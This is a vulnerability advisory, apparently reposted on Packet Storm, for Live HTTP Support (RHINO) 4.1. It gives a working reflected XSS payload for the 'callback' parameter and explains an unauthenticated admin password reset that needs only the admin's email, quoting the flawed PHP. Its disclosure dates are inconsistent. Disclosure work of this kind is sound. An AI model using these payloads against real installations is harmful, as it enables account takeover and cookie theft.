Live HTTP Support (RHINO) version 4.1 suffers from cross site scripting and remote change password vulnerabilities.
d6a5661414735a9e68439cfe4f05cff2b4a712098c557f7fb52c21864dabbb9fAdvisory: Live http support (RHINO) 4.1 (Frontend) - XSS & Remote
Change Password
Author: Slotleet
Email: Slotleet@Gmail.com
Affected Software: Successfully tested on Live http support (RHINO) 4.1
Vendor URL: http://www.livesupportrhino.com
Vendor Status: Not Fixed
==========================
Vulnerability Description
==========================
The Live http Support (RHINO) 4.1 (Backend) is prone to XSS & Remote Change
Password
==========================
PoC-Exploit
==========================
// Non-Persistent XSS with "callback" Parameter in
/include/proactive_cross.php
(1) Under "callback" set your GET Parameter Callback to
"><script>alert(document.cookie)</script>
The Non-Persistent XSS will be executed for the Administrator in the
browser (he directly logged in because you chatting with him)
// Remote Change Password - with "Forgot.php"
http://[target]/rhino/operator/index.php?p=forgot
(1) in the forgot file there's no condition if the user logged in or not,
so we can look deeply in the file in line (27-67)
if ($_SERVER["REQUEST_METHOD"] == 'POST' && isset($_POST['newP'])) {
$defaults = $_POST;
$femail = filter_var($_POST['f_email'], FILTER_SANITIZE_EMAIL);
$pass = $_POST['f_pass'];
$newpass = $_POST['f_newpass'];
if ($pass != $newpass) {
$errors['e1'] = $tl['error']['e10'];
} elseif (strlen($pass) <= '5') {
$errors['e1'] = $tl['error']['e11'];
}
if ($defaults['f_email'] == '' || !filter_var($defaults['f_email'],
FILTER_VALIDATE_EMAIL)) {
$errors['e'] = $tl['error']['e3'];
}
$fwhen = 0;
$user_check = $lsuserlogin->lsForgotpassword($femail, $fwhen);
if ($user_check == true && count($errors) == 0) {
// The new password encrypt with hash_hmac
$passcrypt = hash_hmac('sha256', $pass, DB_PASS_HASH);
$result2 = $lsdb->query('UPDATE '.DB_PREFIX.'user SET password =
"'.$passcrypt.'", forgot = 0 WHERE email = "'.smartsql($femail).'"');
$result = $lsdb->query('SELECT username FROM '.DB_PREFIX.'user WHERE
email = "'.smartsql($femail).'" LIMIT 1');
$row = $result->fetch_assoc();
if (!$result) {
ls_redirect(JAK_PARSE_ERROR);
} else {
$lsuserlogin->lsLogin($row['username'], $pass, 0);
ls_redirect(BASE_URL);
}
} else {
$errorsf = $errors;
}
}
So there is an MySQL Query to execute if the email in the database (Show up
the change password settings).
ALL YOU HAVE TO DO IS DISCOVER THE E-MAIL ADDRESS THAT PUTTED WHEN ADMIN
INSTALLED THE SCRIPT.
==========================
Solution
==========================
Send activation code to the e-mail address.
==========================
Disclosure Timeline
==========================
30-Jan-2014 - developer informed by email
30-Jan-2014 - Developer didn't Respond
31-Jan-2014 - Still Not Respond
06-Feb-2014 - Vulnerability Discovered
==========================
Credits
==========================
Vulnerabilities found and advisory written by Slotleet.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed